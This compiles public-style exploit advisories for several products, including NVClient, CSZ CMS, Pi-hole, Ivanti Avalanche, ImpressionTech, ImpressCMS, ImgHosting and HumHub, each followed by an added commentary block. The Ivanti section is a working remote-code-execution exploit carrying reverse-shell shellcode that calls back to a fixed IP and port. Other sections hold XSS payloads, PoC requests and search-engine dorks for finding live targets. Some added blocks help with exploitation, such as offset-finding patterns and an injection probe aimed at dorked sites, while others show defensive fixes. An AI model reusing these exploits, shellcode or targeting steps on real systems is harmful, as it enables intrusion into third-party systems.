<pre><code># Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 2023-08-19<br /># Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar<br /># Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf<br /># Vulnerability Type: Local Buffer Overflow (Denial of Service)<br /># Tested On: Windows 10 64bit<br /># Tested Version: 5.0<br /><br /><br /># Steps to Reproduce:<br /># 1- Run the Python script below; it creates exploit.txt<br /># 2- Open the application and log in<br /># 3- Click the "Config" button in the upper menu<br /># 4- Click the "User" button just below it<br /># 5- Click the "Add users" button in the lower left<br /># 6- Fill in the Username, Password and Confirm boxes<br /># 7- Paste the contents of exploit.txt into the Contact box<br /># 8- Click OK: the application crashes<br /><br />#!/usr/bin/env python3<br /><br /># 846 bytes is enough to overrun the stack buffer behind the Contact field<br />exploit = 'A' * 846<br /><br />try:<br />    with open("exploit.txt", "w") as file:<br />        file.write(exploit)<br />    print("POC is created")<br />except OSError as err:<br />    print("POC not created:", err)<br /><br /><br /></code></pre>
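The advisory stops at "846 bytes crashes it". The next thing a practitioner wants is the offset at which the saved return address is overwritten. The block below is an added example, not the advisory's script: it replaces `'A' * 846` with a cyclic pattern of the same length (the scheme Metasploit's pattern_create/pattern_offset use) and recovers the offset from the value seen in EIP. The file name and length are taken from the advisory; everything else is this example's own.

```python
# Added example, not from the NVClient advisory: replace 'A' * 846 with a
# cyclic pattern so the value that lands in EIP (or the faulting address)
# tells you the exact offset. Same scheme as Metasploit's pattern_create /
# pattern_offset. File name exploit.txt and length 846 come from the advisory.
import itertools
import string


def cyclic_pattern(length: int) -> bytes:
    """Return `length` bytes in which every 4-byte window is unique.

    Triples are upper, lower, digit ("Aa0Aa1...Ab0..."), so the sequence is
    unique for 26 * 26 * 10 * 3 = 20280 bytes before it would repeat.
    """
    if length > 20280:
        raise ValueError("pattern would repeat beyond 20280 bytes")
    out = bytearray()
    for upper, lower, digit in itertools.product(
            string.ascii_uppercase, string.ascii_lowercase, string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern: bytes, value, little_endian: bool = True) -> int:
    """Offset of the 4 bytes seen in a register (int) or of raw bytes in the pattern.

    On a little-endian target EIP=0x41346241 means the bytes 'Ab4A' sat at
    that position, so an int is converted to bytes in memory order first.
    """
    if isinstance(value, int):
        needle = value.to_bytes(4, "little" if little_endian else "big")
    else:
        needle = bytes(value)
    offset = pattern.find(needle)
    if offset < 0:
        raise ValueError("value not found in pattern; wrong endianness or length?")
    return offset


def write_poc(path: str = "exploit.txt", length: int = 846) -> bytes:
    """Write the pattern for pasting into the Contact box; returns the bytes written."""
    data = cyclic_pattern(length)
    with open(path, "wb") as fh:
        fh.write(data)
    return data


if __name__ == "__main__":
    poc = write_poc()
    eip = int.from_bytes(poc[400:404], "little")   # pretend this is what the debugger showed
    print("wrote %d bytes; EIP=0x%08x would mean offset %d"
          % (len(poc), eip, pattern_offset(poc, eip)))
```

Paste the generated file exactly as the advisory's steps describe, read EIP from the debugger at the crash, and feed it to `pattern_offset`; if the value is not found, the register probably holds a pointer into the buffer rather than the overwritten return address, which is why the function raises instead of guessing.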
<pre><code># Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery')<br /># Date: 2023/08/18<br /># CVE: CVE-2023-38911<br /># Exploit Author: Daniel González<br /># Vendor Homepage: https://www.cszcms.com/<br /># Software Link: https://github.com/cskaza/cszcms<br /># Version: 1.3.0<br /># Tested on: CSZ CMS 1.3.0<br /># Description:<br /># CSZ CMS 1.3.0 is affected by a stored cross-site scripting (XSS) vulnerability that allows a user with access to the admin panel to execute arbitrary web scripts or HTML via a crafted payload entered in the 'YouTube URL' field of a previously created gallery in the 'Gallery' section. Note that the "Name" field used when creating a gallery was vulnerable to XSS in earlier releases; that was fixed in 1.3.0. The vulnerability described here affects the "YouTube URL" field inside the created gallery.<br /><br /># Steps to reproduce Stored XSS:<br /><br />Log in to the admin panel, go to the "Gallery" section [http://localhost/admin/plugin/gallery] and create a gallery.<br />Edit the gallery just created [http://localhost/admin/plugin/gallery/edit/2]; the vulnerable field is "YouTube URL", into which arbitrary web scripts or HTML can be injected.<br /><br />With the following payload we can achieve the XSS.<br /><br />Payload:<br /><br /><div><p title="</div><svg/onload=alert(document.domain)>"><br /><br /><br />#PoC Request:<br /><br />POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 140<br />Origin: http://localhost:8080<br />Referer: http://localhost:8080/admin/plugin/gallery/edit/2<br />Upgrade-Insecure-Requests: 1<br /><br />gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add<br /><br /><br /># Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL')<br /># Date: 2023/08/18<br /># CVE: CVE-2023-38910<br /># Exploit Author: Daniel González<br /># Vendor Homepage: https://www.cszcms.com/<br /># Software Link: https://github.com/cskaza/cszcms<br /># Version: 1.3.0<br /># Tested on: CSZ CMS 1.3.0<br /># Description:<br /># CSZ CMS 1.3.0 is vulnerable to stored cross-site scripting (XSS), which allows a user with access to the admin panel to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Photo URL' and 'YouTube URL' fields of a carousel created in the 'Carousel Widget' section.<br /><br /># Steps to reproduce Stored XSS:<br /><br />Go to http://localhost/admin/carousel and create a carousel.<br /><br />Edit the carousel just created; arbitrary web scripts or HTML can be injected into the "YouTube URL" and "Photo URL" fields.<br /><br />With the following payload we can achieve the XSS.<br /><br />Payload:<br /><br /><div><p title="</div><svg/onload=alert(document.domain)>"><br /><br /><br />#PoC Request:<br /><br /><br />POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1<br />Host: localhost:8080<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 137<br />Origin: http://localhost:8080<br />Referer: http://localhost:8080/admin/carousel/edit/3<br />Upgrade-Insecure-Requests: 1<br /><br />carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add<br /><br /></code></pre>
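Both CSZ CMS advisories above share one payload and one root cause: a URL field that is stored and later written into the page without encoding. The block below is an added example, not CSZ CMS code: it rebuilds the form bodies from the two PoC requests (so the Content-Length values can be checked) and contrasts a template that interpolates the stored value raw with one that allow-lists the URL and escapes it for both attribute and text context. The surrounding markup and the YouTube host allow-list are this example's assumptions, not the plugin's template.

```python
# Added example, not CSZ CMS code: rebuilds the form body from the PoC requests
# above and shows the two ways the stored value can be written back into the
# page. The markup around the field is a stand-in for the plugin's template;
# the YouTube host allow-list is an assumption.
import html
from urllib.parse import urlencode, urlparse

# Payload exactly as in the advisory
PAYLOAD = '<div><p title="</div><svg/onload=alert(document.domain)>">'

YOUTUBE_HOSTS = {"youtube.com", "www.youtube.com", "youtu.be"}


def build_body(type_field: str, type_value: str, url_field: str, value: str) -> str:
    """Form-encode the fields as the browser does (quote-plus: space -> '+', '/' -> %2F)."""
    return urlencode({type_field: type_value, url_field: value, "submit": "Add"})


def render_vulnerable(stored: str) -> str:
    """What the advisory describes: the stored field reaches the browser unencoded."""
    return '<div class="item"><p title="%s">%s</p></div>' % (stored, stored)


def is_youtube_url(url: str) -> bool:
    """Output-side allow-list: https, a known video host, nothing else."""
    parts = urlparse(url)
    return parts.scheme == "https" and (parts.hostname or "") in YOUTUBE_HOSTS


def render_hardened(stored: str) -> str:
    """Validate first, then escape for both attribute and text context."""
    if not is_youtube_url(stored):
        stored = ""                      # drop it (or log it); never echo it raw
    safe = html.escape(stored, quote=True)
    return '<div class="item"><p title="%s">%s</p></div>' % (safe, safe)
```

`build_body("gallery_type", "youtubevideos", "youtube_url", PAYLOAD)` reproduces the first PoC body byte for byte, 140 characters long, and the carousel variant comes to 137, matching both Content-Length headers. The same escape-on-output rule applies to any free-text field a CMS stores and replays, image descriptions included.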
<pre><code># Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control<br /># Google Dork: inurl:admin/scripts/pi-hole/php/queryads.php (https://vuldb.com/?exploit_googlehack.216554)<br /># Date: 21.12.2022<br /># Exploit Author: kv1to<br /># Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17<br /># Tested on: Raspbian / Debian<br /># Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497<br /># CVE : CVE-2022-23513<br /><br />The queryads.php endpoint of the web interface does not enforce authentication. An unauthenticated attacker can query it for blocked domains and read which lists they match; no valid session is needed for the request below.<br /><br />## Proof Of Concept with curl:<br />curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'<br /><br />## HTTP request<br />GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery> HTTP/1.1<br />Host: pi.hole<br />Cookie: [..SNIPPED..]<br />[..SNIPPED..]<br /><br />## HTTP Response<br />HTTP/1.1 200 OK<br />[..SNIPPED..]<br /><br />data: Match found in [..SNIPPED..]<br />data: <domain><br />data: <domain><br />data: <domain><br /></code></pre>
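The response above is a stream of `data:` lines, and the only thing that makes it a finding is that it came back without a session. The block below is an added example, not Pi-hole code: a parser for that reply format, a verdict function for CVE-2022-23513 that refuses to count an authenticated hit as evidence, and the shape of the guard the endpoint lacked (reject before touching the lists). The sample reply and the lookup table are constructed here.

```python
# Added example, not Pi-hole code: parses the "data:" reply format shown above
# and turns it into a yes/no for CVE-2022-23513, plus the shape of the guard the
# endpoint lacked (check the session before touching the lists). The sample
# reply and the lookup table are constructed here.
from typing import Callable, Dict, List, Tuple

SAMPLE_REPLY = (  # constructed to match the response shape in the advisory
    "data: Match found in https://lists.example.invalid/ads.txt:\n"
    "data: ads.example.com\n"
    "data: tracker.example.net\n"
    "data: \n"
)


def parse_queryads(body: str) -> Tuple[List[str], List[str]]:
    """Return (blocklists named, domains listed) from the data: lines."""
    lists, domains = [], []
    for line in body.splitlines():
        if not line.startswith("data:"):
            continue
        text = line[len("data:"):].strip()
        if not text:
            continue
        if text.startswith("Match found in"):
            lists.append(text[len("Match found in"):].strip().rstrip(":"))
        else:
            domains.append(text)
    return lists, domains


def is_exposed(status: int, body: str, sent_session: bool) -> bool:
    """True when a request made WITHOUT a session still returns list data."""
    if sent_session:
        return False            # an authenticated hit proves nothing
    _, domains = parse_queryads(body)
    return status == 200 and bool(domains)


def queryads_endpoint(domain: str, authenticated: bool,
                      lookup: Callable[[str], Dict[str, List[str]]]) -> Tuple[int, str]:
    """Guarded version: refuse before any lookup, then emit the same data: lines."""
    if not authenticated:
        return 401, ""
    lines = []
    for listname, hits in lookup(domain).items():
        lines.append("data: Match found in %s:" % listname)
        lines.extend("data: %s" % h for h in hits)
    lines.append("data: ")
    return 200, "\n".join(lines) + "\n"


def sample_lookup(domain: str) -> Dict[str, List[str]]:
    """Constructed stand-in for the adlist search."""
    table = {"ads.example.com": {"https://lists.example.invalid/ads.txt": ["ads.example.com"]}}
    return table.get(domain, {})
```

When scanning, send the curl request from the advisory with no `Cookie` header at all, then pass the status and body to `is_exposed`; a 200 that carries domain lines is the vulnerable signature, while a redirect to the login page or an empty body is not.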
<pre><code>"""<br />Exploit Title: Ivanti Avalanche <v6.4.0.0 - Remote Code Execution<br />Date: 2023-08-16<br />Exploit Author: Robel Campbell (@RobelCampbell)<br />Vendor Homepage: https://www.ivanti.com/<br />Software Link: https://www.wavelink.com/download/Downloads.aspx?DownloadFile=27550&returnUrl=/Download-Avalanche_Mobile-Device-Management-Software/<br />Version: v6.4.0.0<br />Tested on: Windows 11 21H2<br />CVE: CVE-2023-32560<br />Reference: https://www.tenable.com/security/research/tra-2023-27<br />"""<br /><br />import socket<br />import struct<br />import sys<br /><br /><br /># One item of the message: type, name length, value length, name, value.<br /># name_size and value_size are fixed (5 and 0x800) to match the buffers built below;<br /># struct truncates or zero-pads the value to exactly value_size bytes.<br />class Item:<br />    def __init__(self, type_, name, value):<br />        self.type = type_<br />        self.name = name.encode()<br />        self.value = value<br />        self.name_size = 0x5<br />        self.value_size = 0x800<br /><br />    def pack(self):<br />        return struct.pack('>III{}s{}s'.format(self.name_size, self.value_size),<br />                           self.type, self.name_size, self.value_size, self.name, self.value)<br /><br /><br /># Header items followed by payload items, then zero padding.<br /># The pad is computed from the item counts rather than the byte lengths; kept as in the original exploit.<br />class HP:<br />    def __init__(self, hdr, payload):<br />        self.hdr = hdr<br />        self.payload = payload<br />        self.pad = b'\x00' * (16 - (len(self.hdr) + len(self.payload)) % 16)<br /><br />    def pack(self):<br />        return b''.join([item.pack() for item in self.hdr]) + \<br />               b''.join([item.pack() for item in self.payload]) + self.pad<br /><br /><br /># 16-byte preamble: total message size, header section size, payload section size, unknown field.<br />class Preamble:<br />    def __init__(self, hp):<br />        self.msg_size = len(hp.pack()) + 16<br />        self.hdr_size = sum([len(item.pack()) for item in hp.hdr])<br />        self.payload_size = sum([len(item.pack()) for item in hp.payload])<br />        self.unk = 0  # Unknown value<br /><br />    def pack(self):<br />        return struct.pack('>IIII', self.msg_size, self.hdr_size, self.payload_size, self.unk)<br /><br /><br /># Full message: preamble followed by the header and payload items<br />class Msg:<br />    def __init__(self, hp):<br />        self.pre = Preamble(hp)<br />        self.hdrpay = hp<br /><br />    def pack(self):<br />        return self.pre.pack() + self.hdrpay.pack()<br /><br /><br /># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.86.30 LPORT=4444 exitfunc=thread -f python<br /># Everything in the type-3 value is sent as ASCII hex (two characters per byte): the service<br /># decodes it before the copy that overflows, so the shellcode and addresses are written as hex text.<br />shellcode = b""<br />shellcode += b"fce8820000006089e531c064"<br />shellcode += b"8b50308b520c8b52148b7228"<br />shellcode += b"0fb74a2631ffac3c617c022c"<br />shellcode += b"20c1cf0d01c7e2f252578b52"<br />shellcode += b"108b4a3c8b4c1178e34801d1"<br />shellcode += b"518b592001d38b4918e33a49"<br />shellcode += b"8b348b01d631ffacc1cf0d01"<br />shellcode += b"c738e075f6037df83b7d2475"<br />shellcode += b"e4588b582401d3668b0c4b8b"<br />shellcode += b"581c01d38b048b01d0894424"<br />shellcode += b"245b5b61595a51ffe05f5f5a"<br />shellcode += b"8b12eb8d5d68333200006877"<br />shellcode += b"73325f54684c772607ffd5b8"<br />shellcode += b"9001000029c454506829806b"<br />shellcode += b"00ffd5505050504050405068"<br />shellcode += b"ea0fdfe0ffd5976a0568c0a8"<br />shellcode += b"561e680200115c89e66a1056"<br />shellcode += b"576899a57461ffd585c0740c"<br />shellcode += b"ff4e0875ec68f0b5a256ffd5"<br />shellcode += b"68636d640089e357575731f6"<br />shellcode += b"6a125956e2fd66c744243c01"<br />shellcode += b"018d442410c6004454505656"<br />shellcode += b"5646564e565653566879cc3f"<br />shellcode += b"86ffd589e04e5646ff306808"<br />shellcode += b"871d60ffd5bbe01d2a0a68a6"<br />shellcode += b"95bd9dffd53c067c0a80fbe0"<br />shellcode += b"7505bb4713726f6a0053ffd5"<br /><br />buf = b'90' * 340               # NOP sled<br />buf += b'812b4100'               # jmp esp (0x00412b81), little-endian<br />buf += b'90909090'<br />buf += b'90909090'<br />buf += shellcode<br />buf += b'41' * 80<br />buf += b'84d45200'               # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484)<br />buf += b'43' * (0x800 - len(buf))  # fill to the fixed value_size<br /><br />buf2 = b'41' * 0x1000<br /><br /># Create message payload<br />hdr = [Item(3, "pwned", buf)]<br />payload = [Item(3, "pwned", buf2)]  # dummy payload, probably not necessary<br />hp_instance = HP(hdr, payload)<br />msg_instance = Msg(hp_instance)<br /><br /># Default port<br />port = 1777<br /><br /># check for target host argument<br />if len(sys.argv) > 1:<br />    host = sys.argv[1]<br />else:<br />    print("Usage: python3 CVE-2023-32560.py <host ip>")<br />    sys.exit(1)<br /><br />with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:<br />    s.connect((host, port))<br />    s.sendall(msg_instance.pack())<br />    print("Message sent!")<br /></code></pre>
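The exploit above only builds messages; the interesting question for a defender is what the receiving side should have done with them. The block below is an added example, not Avalanche or Tenable code: a parser for the same preamble/item framing that validates every length against the bytes actually received and hex-decodes type-3 values into a bounded buffer instead of trusting `value_size`. The decoded-size limit, the item types other than 3, and the tiny packer used to build test messages are this example's assumptions.

```python
# Added example, not Avalanche or Tenable code: a parser for the preamble/item
# framing the exploit above builds, written the way a hardened receiver should
# handle it. The exploit sends its type-3 value as ASCII hex, so the parser
# hex-decodes type 3 into a bounded buffer instead of trusting value_size.
# MAX_DECODED and the meaning of other item types are assumptions.
import binascii
import struct

PREAMBLE = struct.Struct('>IIII')   # msg_size, hdr_size, payload_size, unknown
ITEM_HDR = struct.Struct('>III')    # type, name_size, value_size
MAX_DECODED = 0x100                  # assumed size of the receiver's fixed buffer


class MessageError(ValueError):
    pass


def decode_hex_value(raw: bytes, limit: int = MAX_DECODED) -> bytes:
    """Hex-decode a type-3 value; refuse anything that would not fit `limit`."""
    raw = raw.rstrip(b'\x00')
    if len(raw) % 2:
        raise MessageError("odd-length hex value")
    if len(raw) // 2 > limit:
        raise MessageError("decoded value of %d bytes exceeds %d" % (len(raw) // 2, limit))
    try:
        return binascii.unhexlify(raw)
    except binascii.Error as exc:
        raise MessageError("bad hex: %s" % exc) from None


def parse_items(blob: bytes) -> list:
    """Walk one section; every length is checked against what is actually present."""
    items, off = [], 0
    while off < len(blob):
        if off + ITEM_HDR.size > len(blob):
            raise MessageError("truncated item header")
        type_, name_size, value_size = ITEM_HDR.unpack_from(blob, off)
        off += ITEM_HDR.size
        if name_size + value_size > len(blob) - off:
            raise MessageError("item overruns its section")
        name = blob[off:off + name_size]
        off += name_size
        raw = blob[off:off + value_size]
        off += value_size
        value = decode_hex_value(raw) if type_ == 3 else raw
        items.append((type_, name.decode('ascii', 'replace'), value))
    return items


def parse_message(data: bytes):
    """Return (header items, payload items) or raise MessageError."""
    if len(data) < PREAMBLE.size:
        raise MessageError("short preamble")
    msg_size, hdr_size, payload_size, _ = PREAMBLE.unpack_from(data)
    if msg_size != len(data):
        raise MessageError("msg_size %d but %d bytes received" % (msg_size, len(data)))
    if hdr_size + payload_size > msg_size - PREAMBLE.size:
        raise MessageError("section sizes exceed message")
    body = data[PREAMBLE.size:]
    return (parse_items(body[:hdr_size]),
            parse_items(body[hdr_size:hdr_size + payload_size]))


def pack_item(type_: int, name: str, value: bytes) -> bytes:
    """Minimal packer used only to build test messages (real lengths, no fixed sizes)."""
    return ITEM_HDR.pack(type_, len(name), len(value)) + name.encode() + value


def pack_message(hdr_items, payload_items) -> bytes:
    hdr = b''.join(pack_item(*i) for i in hdr_items)
    payload = b''.join(pack_item(*i) for i in payload_items)
    return PREAMBLE.pack(PREAMBLE.size + len(hdr) + len(payload),
                         len(hdr), len(payload), 0) + hdr + payload
```

Run against the exploit's own output, `parse_message` rejects it at `decode_hex_value`: the 0x800-character hex string decodes to 1024 bytes, far beyond the assumed fixed buffer, which is exactly the check the vulnerable copy is missing. Note that the exploit's trailing zero pad sits after both sections, so `hdr_size + payload_size` is allowed to be smaller than the body.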
<pre><code>====================================================================================================================================<br />| # Title : ImpressionTech CMS v1.4 SQL Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 61.0.1 (32-bit) |<br />| # Vendor : http://www.imprtech.com/ |<br />| # Dork : "Website | Impression Technologies LLC" .php?id= |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets with the dork in Google or another search engine.<br /><br />[+] The injectable parameter is id in /news.php?id=58<br /><br />[+] http://127.0.0.1/xxxxxxxxxx.com/news.php?id=58 <======= inject here<br /><br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
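The advisory names only the entry point, `news.php?id=58`, and gives no injection string. The block below is an added example, not ImpressionTech code: against an in-memory SQLite table constructed here, it shows why an id pasted into the query text is injectable (an unpublished row leaks), how the parameterised form closes it, and the boolean-based probe a tester uses to tell the two apart. The schema and rows are assumptions for the example.

```python
# Added example, not ImpressionTech code: the advisory gives only the entry
# point (news.php?id=58). This shows, against an in-memory SQLite table
# constructed here, why an id that is pasted into the query text is
# injectable and how the parameterised form closes it; the schema is assumed.
import sqlite3
from typing import Callable, List, Tuple


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)", [
        (57, "Old post", 1),
        (58, "Public post", 1),
        (59, "Unpublished draft", 0),
    ])
    return db


def fetch_news_vulnerable(db: sqlite3.Connection, id_param: str) -> List[Tuple[int, str]]:
    """The pattern behind news.php?id=: the request value is concatenated into SQL text."""
    sql = "SELECT id, title FROM news WHERE published = 1 AND id = " + id_param
    return db.execute(sql).fetchall()


def fetch_news_safe(db: sqlite3.Connection, id_param: str) -> List[Tuple[int, str]]:
    """Cast to int, then bind; the value can no longer change the query structure."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []
    return db.execute(
        "SELECT id, title FROM news WHERE published = 1 AND id = ?", (news_id,)
    ).fetchall()


def looks_injectable(fetch: Callable, db: sqlite3.Connection, base_id: str) -> bool:
    """Boolean-based probe: a true and a false tautology should give the same answer."""
    true_rows = fetch(db, base_id + " AND 1=1")
    false_rows = fetch(db, base_id + " AND 1=2")
    return true_rows != false_rows
```

`looks_injectable` is the test to run against the dorked targets before anything heavier: `id=58 AND 1=1` returning the article while `id=58 AND 1=2` returns nothing means the parameter is evaluated as SQL.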
<pre><code>====================================================================================================================================<br />| # Title : ImpressCMS v1.3.9 Open Redirect Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 63.0.3 (32-bit) |<br />| # Vendor : http://www.impresscms.org/ |<br />| # Dork : "Powered by ImpressCMS" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Find targets with the dork in Google or another search engine.<br /><br />[+] Use the payload: http://localhost/user.php?xoops_redirect="maliciouslink"<br /><br />[+] http://localhost/user.php?xoops_redirect=https://packetstormsecurity.com/<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /><br /></code></pre>
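The `xoops_redirect` parameter is handed straight to the redirect. The block below is an added example, not ImpressCMS code: the check such a parameter needs before it reaches a `Location:` header, covering the usual bypasses (absolute URLs to other hosts, protocol-relative `//host`, backslash variants, `https:host` without slashes, `javascript:`). The own-host name and the fallback path are assumptions for the example.

```python
# Added example, not ImpressCMS code: the check that a user.php-style
# redirect parameter needs before it is handed to Location:. own_host and the
# fallback path are assumptions for the example.
from urllib.parse import urlsplit


def safe_redirect_target(target: str, own_host: str = "localhost",
                         fallback: str = "/index.php") -> str:
    """Return `target` if it stays on our site, otherwise `fallback`.

    Handles the usual bypasses: absolute URLs to other hosts, protocol-relative
    //host (and ///host), backslash variants (\\host, which browsers read as
    /host), scheme without slashes (https:host) and non-http schemes.
    """
    if not target:
        return fallback
    t = target.strip().replace("\\", "/")
    parts = urlsplit(t)
    if parts.scheme or parts.netloc:
        # absolute or protocol-relative: only http(s) to our own host survives
        if parts.scheme not in ("http", "https"):
            return fallback
        if (parts.hostname or "").lower() != own_host.lower():
            return fallback
        return t
    if t.startswith("//"):
        return fallback           # urlsplit saw no netloc, but browsers would
    if not t.startswith("/"):
        t = "/" + t               # make relative paths root-relative
    return t
```

The simplest policy, and the one used here for anything without a scheme, is to accept only paths on the current site; if external targets are a real requirement, compare `hostname` against an explicit allow-list rather than against the string the user supplied.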
<pre><code>====================================================================================================================================<br />| # Title : ImgHosting v1.3 HTML Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 65.0 (32-bit) |<br />| # Vendor : https://codecanyon.net/user/FoxSash/?ref=FoxSash |<br />| # Dork : "ImgHosting Programming by FoxSash" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Find targets with the dork in Google or another search engine.<br /><br />[+] Register a new user: http://www.127.0.0.1/sowrkom/?register<br /><br />[+] Log in, upload an image file and go to your files: http://127.0.0.1/ikhostingcom/?files<br /><br />[+] Edit the image and put the following meta-refresh redirect in the Description field: <META http-equiv="refresh" content="5;URL=https://cxsecurity.com/"><br /><br />[+] The image page then redirects whoever views it: http://127.0.0.1/ikhostinom/DNSRBJh<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : HumHub v1.3.13 Unrestricted File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Français V.(Pro) / browser : Mozilla Firefox 67.0 (32-bit) |<br />| # Vendor : https://www.humhub.org/en/download/package/humhub-1.3.13.zip |<br />| # Dork : "Propulsé par HumHub" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Find targets with the dork in Google or another search engine.<br /><br />[+] Unrestricted file upload: any registered member can upload a malicious file (for example a .php script) and then execute it.<br /><br />[+] Register a new user.<br /><br />[+] Go to your profile https://127.0.0.1/humhub.com/u/admin/user/profile/home and create a post with the malicious file attached.<br /><br />[+] The uploaded file is reachable at /uploads/file/yours.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
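The HumHub advisory ends with a `.php` file sitting under `/uploads/file/` where the web server will run it. The block below is an added example, not HumHub code: the server-side checks that stop a post attachment from becoming a script, covering the client-supplied path, extension allow-listing (including double extensions such as `shell.php.jpg`), a magic-byte check for the image types accepted, and a server-chosen storage name. The allow-list and sample files are constructed here.

```python
# Added example, not HumHub code: server-side checks that stop a registered
# user turning an upload into /uploads/file/yours.php. The allow-list and the
# sample files used in the test are constructed for this example.
import hashlib
import os
import re

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}
MAGIC = {  # leading bytes of the binary formats we accept
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,100}$")


def check_upload(filename: str, content: bytes) -> tuple:
    """Return (ok, reason). Rejects on path, name, every extension, and content."""
    base = os.path.basename(filename)          # ignore any directory the client sent
    if not SAFE_NAME.match(base) or base.startswith("."):
        return False, "bad filename"
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    exts = parts[1:]
    if any(e not in ALLOWED_EXT for e in exts):  # catches shell.php.jpg and shell.phtml
        return False, "extension not allowed: ." + ".".join(exts)
    ext = exts[-1]
    if ext in MAGIC and not content.startswith(MAGIC[ext]):
        return False, "content does not look like %s" % ext
    return True, "ok"


def stored_name(filename: str, content: bytes) -> str:
    """Server-chosen name: the client never controls where the file lands."""
    ext = os.path.basename(filename).lower().rsplit(".", 1)[-1]
    return hashlib.sha256(content).hexdigest()[:32] + "." + ext
```

These checks close the advisory's path but are not sufficient on their own: the upload directory must also be served with script execution disabled (or from a separate host), so that even a file that slips through the name check is returned as bytes rather than executed.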
